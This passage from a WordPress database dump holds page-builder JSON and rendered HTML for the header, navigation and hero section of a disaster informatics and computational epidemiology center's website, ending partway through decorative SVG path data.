15:40:57','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:40:57','2022-02-16 15:40:57','',23,'https://gsudice.dataconn.net/?p=289',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (290,1,'2022-02-16 15:40:57','2022-02-16 15:40:57','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-start align-items-md-start align-items-start style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path 